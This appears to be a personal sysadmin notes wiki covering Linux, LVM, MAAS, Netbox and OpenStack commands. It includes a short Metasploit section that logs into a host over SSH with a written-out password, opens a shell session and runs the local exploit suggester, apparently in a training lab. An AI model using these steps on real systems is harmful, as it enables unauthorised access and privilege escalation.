    "},{"location":"linux/","title":"Generic Linux","text":"

    Rancid - Check which devices are impacted

    sort var/logs/VPN.20180109.070410  | grep -i key | uniq\n

    Rancid - Only show the device name to pipe into ssh-keygen

    sort var/logs/VPN.20180109.070410  | grep -i key | uniq | grep -Eo '^[^ ]+'\n
    sort /opt/rancid/var/logs/VPN.20180111.064300  | grep -i key | uniq | grep -Eo '^[^ ]+'\n

    SSH - Remove the public keys

    ssh-keygen -f \"/opt/rancid/.ssh/known_hosts\" -R ###REMOTE_IP_OF_DEVICE###\n

    BIND DNS - Check the master zones (not ARPA or random files ) we are hosting

    ls -alh --ignore=*.arpa* | wc -\n

    SMART HD Data - Get useful smartctl data

    sudo smartctl -a /dev/sdb | egrep \"Spin_Up_Time|Reallocated_Sector_Ct|Temperature|Current_Pending_Sector|Offline_Uncorrectable|Power_On_Hours\"\n

    Network - Create TAP Interface

    tunctl -t tap0\nifconfig tap0 10.1.1.100 netmask 255.255.255.0 up\n

    Start Linux stress test

    screen -S stress-test -d -m stress --cpu 100 --io 100 --vm 20 --vm-bytes 1G --hdd 5 --timeout 24h\n

    Install markdown-pdf

    sudo npm install -g phantomjs --unsafe-perm\nsudo npm install -g markdown-pdf --unsafe-perm\n

    Debug Radius, FreeIPA, LDAP

    radiusd -X 2>&1 | tee debugfile\n\ntail -f /var/log/dirsrv/slapd-EVENT-DHMTL-CA/access\n\nradtest ldumont user_ldap_password 10.0.99.22 1812 shared_radius_secret\n\nldapwhoami -vvv -h 10.0.99.22 -p 389 -D uid=ldumont,cn=users,cn=accounts,dc=event,dc=dhmtl,dc=ca -x -w user_ldap_password\n
    "},{"location":"linux/#when-windows-10-creator-upgrade-breaks-linux-grub","title":"When Windows 10 Creator upgrade breaks Linux Grub","text":"
    set root=(hd0,msdos5)\nset prefix=(hd0,msdos5)/boot/grub\ninsmod normal\nnormal\n

    When in the OS - to make the changes permanent.

    sudo update-grub\nsudo grub-install disk\n
    "},{"location":"linux/#upgrading-to-debian-testing-breaks-apt-when-trying-to-downgrade","title":"Upgrading to Debian testing breaks APT when trying to downgrade.","text":"

    Replace \"Ubuntu\" with \"Debian\" if you are running Debian /etc/apt/preferences.d/allow-downgrade

    Package: *\nPin: release a=stable\nPin-Priority: 1001\n
    apt-get update\napt-get upgrade\n

    Remove the file after and

    apt-get update\n

    If you are missing gnome and the display doesn't work

    sudo apt-get update\nsudo apt-get upgrade\nsudo apt-get dist-upgrade\nsudo apt-get install nvidia-driver\nsudo shutdown -r now\n

    Should be good to go!

    "},{"location":"linux/#unbalanced-audio-with-pulse-audio","title":"Unbalanced audio with Pulse audio","text":"
    killall pulseaudio; rm -r ~/.config/pulse/* ; rm -r ~/.pulse*\npulseaudio -k \n

    Reboot!

    "},{"location":"linux/#create-gpg-key-and-export-the-key-format-for-signing-github-commits","title":"Create GPG key and export the key format for signing Github commits","text":"
    #Create the key\ngpg --gen-key\n\n#Show the key ID\ngpg --list-keys\n\n#Set the global Git sign key\ngit config --global user.signingkey $KEY_ID_HERE\n\n#Set the GPG sign flag to true for all repos.\ngit config --global commit.gpgsign true\n\n#Export the key with \"-----BEGIN PGP PUBLIC KEY BLOCK-----\"\ngpg --armor --export laurentfdumont@gmail.com > mykey.asc\n
    "},{"location":"linux/#using-the-ip-tool-to-change-connecticity","title":"Using the \"ip\" tool to change connecticity\"","text":"
    ip link set $DEV_NAME down\nip link set $DEV_NAME up\n\nip route add default via $DEF_GW_IP dev $DEV_NAME\nip addr add $IP_ADDR_CIDR dev $DEV_NAME\nip addr delete $IP_ADDR_CIDR dev $DEV_NAME\n
    "},{"location":"linux/#fix-br-and-vmbr-linux-bridges-filtering-lldp-packets","title":"Fix BR and VMBR Linux bridges filtering LLDP packets","text":"
    https://interestingtraffic.nl/2017/11/21/an-oddly-specific-post-about-group_fwd_mask/\n\necho 16384 > /sys/class/net/$VMBR_INTERFACE/bridge/group_fwd_mask\n
    "},{"location":"linux/#add-fish-as-the-default-shell-for-ubuntudebian","title":"Add fish as the default shell for Ubuntu/Debian.","text":"
    sudo apt-get install fish\n\ncoldadmin@big-potato ~> cat /etc/shells \n# /etc/shells: valid login shells\n/bin/sh\n/bin/bash\n/bin/rbash\n/bin/dash\n/usr/bin/tmux\n/usr/bin/fish\n\nchsh -s /usr/bin/fish\n
    "},{"location":"linux/#one-history-file-for-multiple-prompts","title":"One history file for multiple prompts.","text":"
    vim ~/.bashrc\nexport PROMPT_COMMAND='history -a'\n
    "},{"location":"linux/#enable-terminus-powerline-on-ubuntu-font-name-is-terminess","title":"Enable Terminus Powerline on Ubuntu (font name is Terminess)","text":"
    https://github.com/powerline/fonts/issues/210\nhttps://superuser.com/questions/886023/linux-mint-installing-bdf-fonts-with-console-fc-cache-fc-list\n\ngit clone https://github.com/powerline/fonts\ncd fonts\n./install.sh\n\ncd /etc/fonts/conf.d/\nsudo rm /etc/fonts/conf.d/10*  \nsudo rm -rf 70-no-bitmaps.conf \nsudo ln -s ../conf.avail/70-yes-bitmaps.conf .\nsudo dpkg-reconfigure fontconfig\n
    "},{"location":"linux/#ubuntu-1904-disable-ubuntu-dock-completely","title":"Ubuntu 19.04 - Disable Ubuntu dock completely.","text":"

    https://askubuntu.com/questions/1030138/how-can-i-get-rid-of-the-dock-in-ubuntu-18

    cd /usr/share/gnome-shell/extensions/\nsudo mv ubuntu-dock@ubuntu.com{,.bak}\n
    "},{"location":"linux/#change-fan-speed-of-a-r710-through-ipmi","title":"Change fan speed of a R710 through IPMI.","text":"

    IPMI needs to be enabled in ILO! You need valid credentials! This disables the auto-adjust of the fan speed, be careful of the R710 heating. I am not responsible for fires :)

    #Get the ENV data from the IPMI\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD sensor reading \"Ambient Temp\" \"FAN 1 RPM\" \"FAN 2 RPM\" \"FAN 3 RPM\"\n\n#Enable manual fan control.\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD raw 0x30 0x30 0x01 0x00\n\n#\"Activating manual fan speeds! (2160 RPM)\"\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD raw 0x30 0x30 0x02 0xff 0x09\n
    "},{"location":"linux/#check-bonding-status","title":"Check bonding status","text":"
    cat /proc/net/bonding/mgmt\ncat /proc/net/bonding/$INTERFACE_NAME_HERE\n
    "},{"location":"linux/#get-low-level-interface-stats","title":"Get low-level interface stats","text":"
    ethtool -S $INTERFACE_NAME_HERE\nethtool -S mgmt-1\n
    "},{"location":"linux/#ssh-without-using-all-identity-files-automatically","title":"SSH without using all identity files automatically","text":"
    ssh -o \"IdentitiesOnly true\" -v -A user@host\n
    "},{"location":"linux/#remove-resolvctl-issues-with-openvpn-dns-being-removed","title":"Remove resolvctl (issues with OpenVPN DNS being removed)","text":"
    sudo systemctl disable systemd-resolved.service\nsudo systemctl stop systemd-resolved.service\n\ndns=default in [main] section of \"sudo vi /etc/NetworkManager/NetworkManager.conf\"\n\nsudo rm /etc/resolv.conf\nsudo service network-manager restart\n
    "},{"location":"linux/#troubleshoot-apt-install-errors","title":"Troubleshoot APT install errors.","text":"
    # Find the correct file from :\ncd /var/lib/dpkg/info/\n# In this case, it was the Foreman postinst script\ncat foreman.postinst\n# Increase verbosity\nEXPORT DEBUG=1\n# Run the failing configure package\ndpkg --configure foreman\n
    "},{"location":"linux/#docker-hugo","title":"Docker Hugo","text":"
    docker run --rm -it -v /srv/hugo:/src -u hugo laurentfdumont/laurent-hugo hugo new site mysite\ndocker run --rm -it -v /srv/hugo/mysite:/src -u hugo laurentfdumont/laurent-hugo hugo new posts/my-first-post.md\ndocker run --rm -it -v /srv/hugo/mysite/:/src -u hugo laurentfdumont/laurent-hugo hugo\ndocker run --rm -it -v /srv/hugo/mysite:/src -p 1313:1313 -u hugo laurentfdumont/laurent-hugo hugo server -b http://linode2.coldnorthadmin.com -w --bind=0.0.0.0\ndocker run --rm -it -v /srv/hugo/mysite:/src -u hugo laurentfdumont/laurent-hugo hugo new posts/my-first-post.md\ndocker run --rm -it -v /srv/hugo:/src -u hugo jguyomard/hugo-builder hugo new site mysite \n
    "},{"location":"linux/#check-and-clean-for-fstrim","title":"Check and clean for FSTRIM","text":"

    Only support for SCSI disk - proxmox.

    #Check TRIM support status\nlsblk -D\n\n### BAD NO support\nroot@kolla-controller003:~# lsblk -D\nNAME              DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO\nvda                      0        0B       0B         0\n|-vda1                   0        0B       0B         0\n|-vda2                   0        0B       0B         0\n`-vda5                   0        0B       0B         0\n  |-system-root          0        0B       0B         0\n  `-system-swap_1        0        0B       0B         0\n\n### OK support\nroot@kolla-compute004:~# lsblk -D\nNAME              DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO\nsda                      0        4K       1G         0\n|-sda1                   0        4K       1G         0\n|-sda2                1024        4K       1G         0\n`-sda5                   0        4K       1G         0\n  |-system-root          0        4K       1G         0\n  `-system-swap_1        0        4K       1G         0\n\n### Start TRIM PROCESS\nfstrim -av\nroot@kolla-compute004:~# fstrim -av\n/boot: 755.4 MiB (792125440 bytes) trimmed\n/: 49 GiB (52552167424 bytes) trimmed\n
    "},{"location":"linux/#reduce-swap-size-and-increase-root-fs-size","title":"Reduce swap size and increase root FS size","text":"
    # Disable swap temporarly.\nswapoff -a\n\n# Reduce swap paritition.\nlvreduce /dev/superbacon-vg/swap_1 -L -67G\n\n# Extend LVM root paritition.\nlvextend /dev/superbacon-vg/root -L +67G\n\n# Extend actual partition size.\nresize2fs /dev/superbacon-vg/root\n\n# Recreate swap partition\nmkswap /dev/superbacon-vg/swap_1\n\n# Re-enable swap partition\nswapon -a\n
    "},{"location":"linux/#mount-disk-to-linux","title":"Mount disk to linux","text":"
    # Create an ext4 partition.\nmkfs.ext4 /dev/vg-storage/lv-storage\n\n# Mount the partition to test.\nmount -t ext4 /dev/vg-storage/lv-storage /mnt\n\n# Mount in /etc/fstab\n/dev/mapper/vg--storage-lv--storage /storage    ext4    defaults,nofail        0    1\n
    "},{"location":"linux/#check-iscsi-disks","title":"Check ISCSI disks","text":"
    sudo lsblk -S\n
    "},{"location":"linux/#boot-logs","title":"Boot logs","text":"
    /var/log/boot.log  ---  System boot log\n\n/var/log/dmesg     ---  print or control the kernel ring buffer\n
    "},{"location":"linux/#upgrade-kernel-on-centos7","title":"Upgrade Kernel on Centos7","text":"
    [root@ooo-director ~]# rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org\n[root@ooo-director ~]# yum install https://www.elrepo.org/elrepo-release-7.0-4.el7.elrepo.noarch.rpm\n
    [root@ooo-director ~]# yum repolist\nLoaded plugins: fastestmirror, priorities\nLoading mirror speeds from cached hostfile\n * base: mirror.calgah.com\n * elrepo: iad.mirror.rackspace.com\n * extras: mirror.calgah.com\n * updates: mirror.calgah.com\nrepo id                                                repo name                                                                                       status\nbase/7/x86_64                                          CentOS-7 - Base                                                                                  10,097\ndelorean-train                                         delorean-openstack-trove-7680b5ef0e3608b2c45f057f65337c4af3d5659d                               801+348\ndelorean-train-build-deps                              dlrn-train-build-deps                                                                            139+78\ndelorean-train-testing                                 dlrn-train-testing                                                                              875+823\nelrepo                                                 ELRepo.org Community Enterprise Linux Repository - el7                                              139\nextras/7/x86_64                                        CentOS-7 - Extras                                                                                   307\nrdo-qemu-ev/x86_64                                     RDO CentOS-7 - QEMU EV                                                                               87\nupdates/7/x86_64                                       CentOS-7 - Updates                                                                                1,010\nrepolist: 13,455\n
    yum --enablerepo=elrepo-kernel install kernel-ml\n
    [root@ooo-director ~]# awk -F\\' '$1==\"menuentry \" {print i++ \" : \" $2}' /etc/grub2.cfg\n0 : CentOS Linux (5.4.6-1.el7.elrepo.x86_64) 7 (Core)\n1 : CentOS Linux (3.10.0-1062.9.1.el7.x86_64) 7 (Core)\n2 : CentOS Linux (3.10.0-1062.el7.x86_64) 7 (Core)\n3 : CentOS Linux (0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa) 7 (Core)\n\n[root@ooo-director ~]# grub2-set-default 0\n\n[root@ooo-director ~]# grub2-mkconfig -o /boot/grub2/grub.cfg\nGenerating grub configuration file ...\nFound linux image: /boot/vmlinuz-5.4.6-1.el7.elrepo.x86_64\nFound initrd image: /boot/initramfs-5.4.6-1.el7.elrepo.x86_64.img\nFound linux image: /boot/vmlinuz-3.10.0-1062.9.1.el7.x86_64\nFound initrd image: /boot/initramfs-3.10.0-1062.9.1.el7.x86_64.img\nFound linux image: /boot/vmlinuz-3.10.0-1062.el7.x86_64\nFound initrd image: /boot/initramfs-3.10.0-1062.el7.x86_64.img\nFound linux image: /boot/vmlinuz-0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa\nFound initrd image: /boot/initramfs-0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa.img\ndone\n
    "},{"location":"linux/#ps-a-process-list-for-process-accounting","title":"PS a process list for process accounting","text":"
    ps -eo cmd \n
    "},{"location":"linux/#send-a-sysrq-though-kvm","title":"Send a sysrq though KVM","text":"

    Types of event Dec 26 20:04:49 director kernel: SysRq : HELP : loglevel(0-9) reboot(b) crash(c) terminate-all-tasks(e) memory-full-oom-kill(f) kill-all-tasks(i) thaw-filesystems(j) sak(k) show-backtrace-all-active-cpus(l) show-memory-usage(m) nice-all-RT-tasks(n) poweroff(o) show-registers(p) show-all-timers(q) unraw(r) sync(s) show-task-states(t) unmount(u) force-fb(V) show-blocked-tasks(w) dump-ftrace-buffer(z)

    #In the guest VM\necho 1 > /proc/sys/kernel/sysrq\n\n#To make it permanent\n[root@director ~]# cat /etc/sysctl.d/sysrq.conf \nkernel.sysrq = 1\n\n#From the Hypervisor\n#KEY_B replace what is after the _ for the correct action. This will reboot the target host.\nroot@kvm01:/tmp# virsh send-key ooo-director KEY_LEFTALT KEY_SYSRQ KEY_B\n
    "},{"location":"linux/#install-pgcli-postgres-cmd-line-cli-ubuntu-1904","title":"Install pgcli - postgres cmd line CLI - Ubuntu 19.04","text":"
    sudo apt-get install libpq-dev python-dev\npip3 install pgcli\npgcli --host 127.0.0.1 --port 5432 --user ara_user --dbname ara --password\n
    "},{"location":"linux/#redhat-centos-bonding-lacp-vlan","title":"Redhat / Centos bonding LACP - VLAN","text":"
    modprobe bonding\n\n#vi /etc/sysconfig/network-scripts/ifcfg-bond0\nDEVICE=bond0\nType=Bond\nNAME=bond0\nBONDING_MASTER=yes\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nBONDING_OPTS=\"mode=4 miimon=100 lacp_rate=1\"\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em1\nDEVICE=em1\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em2\nDEVICE=em2\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em3\nDEVICE=em3\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n
    "},{"location":"linux/#write-speed-test","title":"Write speed test","text":"

    https://www.thomas-krenn.com/en/wiki/Linux_I/O_Performance_Tests_using_dd

    dd if=/dev/zero of=/root/testfile bs=1G count=1 oflag=dsync\n
    "},{"location":"linux/#extend-lv","title":"Extend lv","text":"
    sudo lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv\nsudo resize2fs /dev/ubuntu-vg/ubuntu-lv\n
    "},{"location":"linux/#set-dns-with-resolvctl","title":"Set DNS with resolvctl","text":"
    laurentdumont@docker01:/srv$ sudo resolvectl dns \nGlobal:\nLink 17 (vethc025466):\nLink 15 (vetheb3b292):\nLink 13 (veth45fcbdc):\nLink 3 (docker0):\nLink 2 (ens192): 10.199.199.1\n\n\nsudo resolvectl dns ens192 10.199.199.1\n
    "},{"location":"linux/#fix-openvpn-dns-issues-with-new-resolved-for-dns","title":"Fix openvpn DNS issues with new resolved for DNS","text":"
    sudo apt install openvpn-systemd-resolved\n
    "},{"location":"linux/#show-disk-info","title":"Show disk info","text":"
    lshw -class disk\nhwinfo --disk\n
    "},{"location":"linux/#create-one-pdf-from-multiple","title":"Create one PDF from multiple","text":"
    # From within folder containing the PDF pages \nqpdf --empty --pages *.pdf -- out.pdf\n
    "},{"location":"linux/#change-image-size","title":"Change image size","text":"
    convert myfigure.png -resize 200x100 myfigure.jpg\n
    "},{"location":"lvm/","title":"LVM","text":""},{"location":"lvm/#reduce-swap-and-extend-other-lvm-module","title":"Reduce swap and extend other LVM module","text":"
    # Disable swap temporarly.\nswapoff -a\n\n# Reduce swap paritition.\nlvreduce /dev/superbacon-vg/swap_1 -L -67G\n\n# Extend LVM root paritition.\nlvextend /dev/superbacon-vg/root -L +67G\n\n# Extend actual partition size.\nresize2fs /dev/superbacon-vg/root\n\n# Recreate swap partition\nmkswap /dev/superbacon-vg/swap_1\n\n# Re-enable swap partition\nswapon -a\n\n----------------- Mount partition from existing VG/LV -----------------\n# Create an ext4 partition.\nmkfs.ext4 /dev/vg-storage/lv-storage\n\n# Mount the partition to test.\nmount -t ext4 /dev/vg-storage/lv-storage /mnt\n\n# Mount in /etc/fstab\n/dev/mapper/vg--storage-lv--storage /storage    ext4    defaults,nofail        0    1\n
    7  echo \"deb http://download.proxmox.com/debian/pve stretch pve-no-subscription\" > /etc/apt/sources.list.d/pve-install-repo.list\n    8  wget http://download.proxmox.com/debian/proxmox-ve-release-5.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-5.x.gpg\n    9  apt update && apt dist-upgrade\n   10  apt install proxmox-ve postfix open-iscsi\n   11  clear\n   12  shutdown -r now\n   13  mount /dev/sdb1 /storage\n   14  mkdir /storage\n   15  mount /dev/sdb1 /storage\n   16  mount /dev/sdb /storage\n   17  mount -t ext4 /dev/sdb /storage\n   18  dmesg | tail\n   19  fdisk -l\n   20  lvdisplay \n   21  vgdisplay \n   22  vgscan \n   23  fdisk -l\n   24  clear\n   25  vgdisplay \n   26  lvmdiskscan \n   27  vgcreate \n   28  vgcreate /dev/sdb1\n   29  pvs\n   30  vgcreate vg-storage /dev/sdb1\n   31  vgdisplay \n   32  man lvcreate \n   33  lvcreate -n storage -l 100%FREE vg-storage\n   34  lvdisplay \n   35  clear\n   36  mkfs.ext4 /dev/vg-storage/storage\n   37  lvdisplay \n   38  man mount\n   39  man mount\n   40  man mount\n   41  mount -t ext4 /dev/vg-storage/storage /storage\n   42  cd /storage\n   43  mkdir tata\n   44  ls\n   45  rm tata\n   46  rm -rf tata\n   47  clear\n   48  exit\n   49  history\n
    "},{"location":"maas/","title":"MAAS","text":""},{"location":"maas/#adding-a-custom-power-provider-for-maas","title":"Adding a custom power provider for MAAS.","text":""},{"location":"maas/#install-proxmoxer-for-python3","title":"Install proxmoxer for Python3","text":"
    pip3 install proxmoxer\n
    "},{"location":"maas/#proxmox-script-source-httpsbugslaunchpadnetmaasbug1805799","title":"Proxmox Script - source https://bugs.launchpad.net/maas/+bug/1805799","text":"
    # Copyright 2018 Wojciech Rakoniewski  \n# This software is licensed under the\n# GNU Affero General Public License version 3 (see the file LICENSE).\n#\n# tested on Proxmox VE 5.2-11 but should work with any version\n# libraries: proxmoxer\n#   tested with version 1.02 installed using apt\n\n\"\"\"Proxmox Power Driver for MAAS\"\"\"\n\n__all__ = [\n        \"ProxmoxError\",\n        \"ProxmoxPowerDriver\"\n        ]\n\nfrom provisioningserver.drivers import (\n    make_ip_extractor,\n    make_setting_field,\n    SETTING_SCOPE,\n)\nfrom provisioningserver.drivers.power import (\n    PowerDriver,\n    PowerError\n)\n\ntry:\n    from proxmoxer import ProxmoxAPI\n    PROXMOXER_IMPORTED = True\nexcept ImportError:\n    PROXMOXER_IMPORTED = False\n\nPROXMOX_YES=\"y\"\nPROXMOX_NO=\"n\"\n\nPROXMOX_VALIDATE_SSL_CHOICES = [\n    [PROXMOX_YES, \"Yes\"],\n    [PROXMOX_NO, \"No\"]]\n\nclass ProxmoxError(PowerError):\n    \"\"\"Failure communicating to proxmox \"\"\"\n\nclass ProxmoxPowerDriver(PowerDriver):\n\n    name = 'proxmox'\n    chassis = True\n    description = \"Proxmox (virtual systems)\"\n    settings = [\n        make_setting_field(\n            'power_vm_name', \"VM id or name\", required=True,\n            scope=SETTING_SCOPE.NODE),\n        make_setting_field('power_address', \n            \"Proxmox host name or ip\", required=True),\n        make_setting_field('power_user', \n            \"Proxmox username (user@realm)\", required=True),\n        make_setting_field(\n            'power_pass', \"Proxmox password\", field_type='password',\n            required=True),\n        make_setting_field('power_ssl_validate', \"Validate ssl\", \n            field_type='choice', required=True, \n            choices=PROXMOX_VALIDATE_SSL_CHOICES, default=PROXMOX_NO),\n    ]\n    ip_extractor = make_ip_extractor('power_address')\n\n    def detect_missing_packages(self):\n        if not PROXMOXER_IMPORTED:\n            return [\"python3-proxmoxer\"]\n        return []\n\n   
 def power_on(self, system_id, context):\n        \"\"\"Power on Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        vm.status.start.post();\n\n    def power_off(self, system_id, context):\n        \"\"\"Power off Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        vm.status.stop.post();\n\n    def power_query(self, system_id, context):\n        \"\"\"Power query Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        ncd=vm.status.current.get()\n\n        if ncd['status'] == 'running':\n            return \"on\"\n        else:\n            return \"off\"\n\n\n    def __proxmox_login(self,system_id,context):\n        \"\"\"Login to proxmox server.\"\"\"\n\n        api_host = context.get('power_address')\n        api_user = context.get('power_user')\n        api_password = context.get('power_pass')\n        vm_id = context.get('power_vm_name')\n        api_ssl_val = (context.get('power_validate_ssl')==PROXMOX_YES)\n\n        try:\n            api = ProxmoxAPI(api_host, user=api_user, \n                    password=api_password, verify_ssl=api_ssl_val)\n\n            con_vm=None\n            for vm in api.cluster.resources.get(type=\"vm\"):\n                if (str(vm['vmid'])==vm_id) or (vm['name']==vm_id):\n                    con_vm=vm\n                    break\n\n        except Exception:\n            raise ProxmoxError(\n                    \"Can't connect to proxmox cluster %s\" % (api_host))\n\n        if con_vm is None:\n            \"\"\"vm not found\"\"\"\n            raise ProxmoxError(\n                    \"Virtual machine %s not found on proxmox cluster %s\" % (vm_id, api_host))\n\n        #extract node object\n        vm_obj=getattr(getattr(getattr(api.nodes,con_vm['node']),\n            con_vm['type']),\n            str(con_vm['vmid']))\n\n        return vm_obj\n
    "},{"location":"maas/#location-of-the-power-scripts-for-maas","title":"Location of the power scripts for MAAS.","text":"
    /usr/lib/python3/dist-packages/provisioningserver/drivers/power/proxmox.py\n/usr/lib/python3/dist-packages/provisioningserver/drivers/power/registry.py\n
    "},{"location":"maas/#edit-registrypy-and-add-the-following-lines-to-the-bottom-of-the-import-section","title":"Edit registry.py and add the following lines to the bottom of the import section.","text":"
    from provisioningserver.drivers.power.proxmox import ProxmoxPowerDriver\n
    "},{"location":"maas/#add-the-following-line-to-the-bottom-of-the-power_drivers-array","title":"Add the following line to the bottom of the power_drivers array.","text":"
    ProxmoxPowerDriver(),\n
    # Register all the power drivers.\npower_drivers = [\n    AMTPowerDriver(),\n    APCPowerDriver(),\n    DLIPowerDriver(),\n    FenceCDUPowerDriver(),\n    HMCPowerDriver(),\n    IPMIPowerDriver(),\n    ManualPowerDriver(),\n    MoonshotIPMIPowerDriver(),\n    MSCMPowerDriver(),\n    MicrosoftOCSPowerDriver(),\n    NovaPowerDriver(),\n    RECSPowerDriver(),\n    SeaMicroPowerDriver(),\n    UCSMPowerDriver(),\n    VirshPowerDriver(),\n    VMwarePowerDriver(),\n    WedgePowerDriver(),\n    ProxmoxPowerDriver(),\n]\n
    "},{"location":"maas/#restart-the-rack-controller","title":"Restart the rack controller.","text":"
    systemctl restart maas-rackd\n
    "},{"location":"metasploit/","title":"Metasploit","text":""},{"location":"metasploit/#metasploit-plugins","title":"Metasploit plugins","text":""},{"location":"metasploit/#how-to-use-an-ssh-login-as-a-msf-session","title":"How to use an ssh login as a msf session","text":"
    use auxiliary/scanner/ssh/ssh_login\nset rhosts 10.10.127.204\nset username typhoon\nset password 789456123\n\n# show sessions\nsessions\n\nmsf5 post(multi/recon/local_exploit_suggester) > sessions\n\nActive sessions\n===============\n\n  Id  Name  Type         Information                               Connection\n  --  ----  ----         -----------                               ----------\n  1         shell linux  SSH typhoon:789456123 (10.10.127.204:22)  10.9.179.67:40461 -> 10.10.127.204:22 (10.10.127.204)\n\n# use specific session\nset session 1\n
    "},{"location":"metasploit/#use-the-msf-exploit-suggestion","title":"Use the msf exploit suggestion","text":"
    use post/multi/recon/local_exploit_suggester\nexploit\n
    "},{"location":"molecule/","title":"Molecule","text":""},{"location":"molecule/#testing-framework-for-ansible","title":"Testing framework for Ansible.","text":""},{"location":"molecule/#installation-ubuntu-1804-lts","title":"Installation Ubuntu 18.04 LTS","text":"
    sudo apt-get install -y python-pip libssl-dev\npip install --user molecule\n
    "},{"location":"molecule/#create-a-test-setup-in-an-existing-role","title":"Create a test setup in an existing role","text":"
    #From within the role folder\nmolecule init scenario -r my-role-name\n
    "},{"location":"molecule/#start-a-full-testing-run","title":"Start a full testing run","text":"
    sudo molecule test\n
    "},{"location":"mysql/","title":"MySQL/MariaDB","text":""},{"location":"mysql/#create-database-and-user","title":"Create Database and user.","text":"
    CREATE DATABASE `racktables`;\nCREATE USER 'racktables_user' IDENTIFIED BY 'test';\nGRANT ALL privileges ON `racktables`.* TO 'racktables_user'@'%';\n\n\nCREATE DATABASE `netbox`;\nCREATE USER 'netbox_user' IDENTIFIED BY 'test';\nGRANT ALL privileges ON `netbox`.* TO 'netbox_user'@'%';\n
    "},{"location":"mysql/#check-galera-status","title":"Check Galera status","text":"
    MariaDB [(none)]> SHOW GLOBAL STATUS LIKE 'wsrep_%';\n
    "},{"location":"netbox/","title":"Netbox","text":"
    apt-get update\napt-get install -y postgresql libpq-dev\n
    sudo -u postgres psql\nCREATE DATABASE netbox;\nCREATE USER netbox WITH PASSWORD 'bigpotato';\nGRANT ALL PRIVILEGES ON DATABASE netbox TO netbox;\n\\q\n
    apt-get install -y python3 python3-dev python3-setuptools build-essential libxml2-dev libxslt1-dev libffi-dev graphviz libpq-dev libssl-dev zlib1g-dev\neasy_install3 pip\n
    mkdir -p /opt/netbox/ && cd /opt/netbox/\ngit clone -b master https://github.com/digitalocean/netbox.git .\npip3 install -r requirements.txt\npip3 install napalm\n
    sudo apt-get install libapache2-mod-wsgi\nsudo a2enmod wsgi\nsudo a2enmod proxy\nsudo a2enmod proxy_http\nsudo a2enmod headers\nsudo a2ensite netbox\nsudo service apache2 restart\n
    <VirtualHost *:80>\n    ServerName netbox.northernsysadmin.com\n    Redirect permanent / https://netbox.northernsysadmin.com/\n</VirtualHost>\n\n<VirtualHost *:443>\n    SSLEngine on\n    SSLCertificateFile $FULL_CHAIN_CERT_HERE\n    SSLCertificateKeyFile $PRIVATE_KEY_CERT_HERE\n    ProxyPreserveHost On\n\n    ServerName netbox.northernsysadmin.com\n\n    Alias /static /opt/netbox/netbox/static\n\n    # Needed to allow token-based API authentication\n    WSGIPassAuthorization on\n\n    <Directory />\n          SetEnvIfNoCase Host netbox.northernsysadmin\\.com VALID_HOST\n          Order Deny,Allow\n          Deny from All\n          Allow from env=VALID_HOST\n    </Directory>\n\n    <Directory /opt/netbox/netbox/static>\n        Options Indexes FollowSymLinks MultiViews\n        AllowOverride None\n        Require all granted\n    </Directory>\n\n    <Location /static>\n        ProxyPass !\n    </Location>\n\n    RequestHeader set \"X-Forwarded-Proto\" expr=%{REQUEST_SCHEME}\n    ProxyPass / http://127.0.0.1:8001/\n    ProxyPassReverse / http://127.0.0.1:8001/\n</VirtualHost>\n
    "},{"location":"openstack/","title":"Openstack","text":""},{"location":"openstack/#general-troubleshoot-shamelessly-stolen-from-httpwwwpanticzdeindexphpopenstack","title":"General troubleshoot - Shamelessly stolen from : http://www.panticz.de/index.php/openstack","text":"
    # list VMs on all hypervisor\nopenstack server list --all --long  -c Name -c Host\n\n# list VMs on specific hypervisor\nopenstack server list --all -c Name -f value --host ${COMPUTE_NODE}\n\n# get VM count by hypervisor\nopenstack server list --all --long  -c Host -f value | sort | uniq -c\n\n# list compute nodes\nopenstack compute service list\n\n# list compute service\nopenstack compute service list --host ${OS_NODE}\n\n# disable compute service\nfor OS_SERVICE in $(openstack compute service list --host ${OS_NODE} -c Binary -f value); do\n    openstack compute service set --disable --disable-reason \"Maintenance\" ${OS_NODE} ${OS_SERVICE}\ndone\n\nopenstack compute service set --disable --disable-reason potato qasite1-compute001.localdomain nova-compute\n\n# Search for server witch status error\nopenstack server list --all --status ERROR\n\n# Search for server with status resizing\nopenstack server list --all --status=VERIFY_RESIZE\n\n# List instances / VMs\nopenstack server list\nopenstack server list -c ID -c Name -c Status -c Networks -c Host --long\n
    "},{"location":"openstack/#start-all-vms-on-a-single-compute","title":"Start all VMs on a single compute","text":"
    for x in `openstack server list --all -c ID -f value --host tenlab1-compute002.localdomain`;do openstack server start $x;done \n
    "},{"location":"openstack/#migrate-to-specific-compute","title":"Migrate to specific compute","text":"
    nova host-evacuate --target_host kolla-compute003 kolla-compute004.cmaker.studio\nwatch nova migration-list\n
    "},{"location":"openstack/#get-all-the-keypairs-existing-for-all-users","title":"Get all the keypairs existing for all users","text":"
    for x in `openstack user list -f value -c ID`;do echo $x && nova keypair-list --user $x;done\n
